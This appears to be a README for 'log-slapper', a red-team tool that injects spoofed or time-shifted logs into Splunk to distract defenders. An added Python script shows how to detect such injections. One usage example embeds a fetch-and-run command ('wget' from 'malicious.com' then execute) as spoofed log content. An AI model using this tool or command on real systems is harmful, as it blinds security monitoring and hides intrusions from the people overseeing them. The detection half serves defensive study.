Every company undoubtedly trusts its SIEM, right? Think twice: we can inject fake logs, distract blue teams (BTs) and hide our attacks.
log-slapper is an offensive security tool for red teamers, designed specifically for the post-exploitation phase of a campaign.
log-slapper can:
- mimic attacks on behalf of any other computer on the network
- run in interactive mode: Target Shell Playzone
- send logs from the future and the past: HEC-based Time Traveller's attack
- perform built-in attacks such as login success/fail spam and new process creations
Go into interactive mode:

```sh
./log-slapper interactive
```

Send a log claiming that "payment-server-01" got hacked and malicious code is running:

```sh
./log-slapper nix_command --hostname "payment-server-01" --ip "23.32.45.123" -t "e270e632-861f-45cc-8f00-f91eb895f5e6" --exectime "10/10/2021 08:45" --command "wget https://malicious.com/test && ./test"
```

Now check your Splunk 🙂
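The spoofed hostname and the HEC-based Time Traveller's attack both leave a trace a defender can look for: a sender-asserted `host` that is not in inventory, and a claimed event time that disagrees with the time the SIEM actually indexed it. The following Python is an added detection example, not part of log-slapper; the sample events, field names and host inventory are constructed assumptions modelled on Splunk's `_time`/`_indextime` fields.

```python
"""Flag ingested events whose claimed timestamp or source host look injected."""
from datetime import datetime, timedelta, timezone

# Constructed sample events in the shape a SIEM search might return:
# `_time` is the timestamp claimed by the sender, `_indextime` is when the
# SIEM actually received it, `host` is the sender-asserted hostname.
SAMPLE_EVENTS = [
    {"host": "web-01", "_time": "2021-10-10T08:45:00Z",
     "_indextime": "2021-10-10T08:45:03Z", "sourcetype": "syslog"},
    {"host": "payment-server-01", "_time": "2021-10-10T08:45:00Z",
     "_indextime": "2024-04-02T14:12:09Z", "sourcetype": "nix_command"},
    {"host": "db-02", "_time": "2031-01-01T00:00:00Z",
     "_indextime": "2024-04-02T14:12:10Z", "sourcetype": "syslog"},
    {"host": "unknown-box", "_time": "2024-04-02T14:12:00Z",
     "_indextime": "2024-04-02T14:12:05Z", "sourcetype": "syslog"},
]

# Constructed inventory of hosts expected to report through this collector.
KNOWN_HOSTS = {"web-01", "payment-server-01", "db-02"}


def _parse(ts):
    """Parse the ISO-8601 UTC timestamps used in the constructed sample."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_suspicious(events, known_hosts=KNOWN_HOSTS, max_skew=timedelta(minutes=5)):
    """Return one finding per event whose claimed time is far from its index
    time (backdated or future-dated injection) or whose host is not in inventory."""
    findings = []
    for ev in events:
        reasons = []
        skew = _parse(ev["_time"]) - _parse(ev["_indextime"])
        if skew > max_skew:
            reasons.append("timestamp in the future")
        elif -skew > max_skew:
            reasons.append("timestamp far in the past")
        if ev["host"] not in known_hosts:
            reasons.append("unknown host")
        if reasons:
            findings.append({"host": ev["host"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["host"], "->", ", ".join(f["reasons"]))
```

Legitimate backfills after a forwarder outage also produce large negative skew, so the threshold needs tuning per source and the host check works only against a maintained inventory.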
For more details on the research, the usage of log-slapper and more: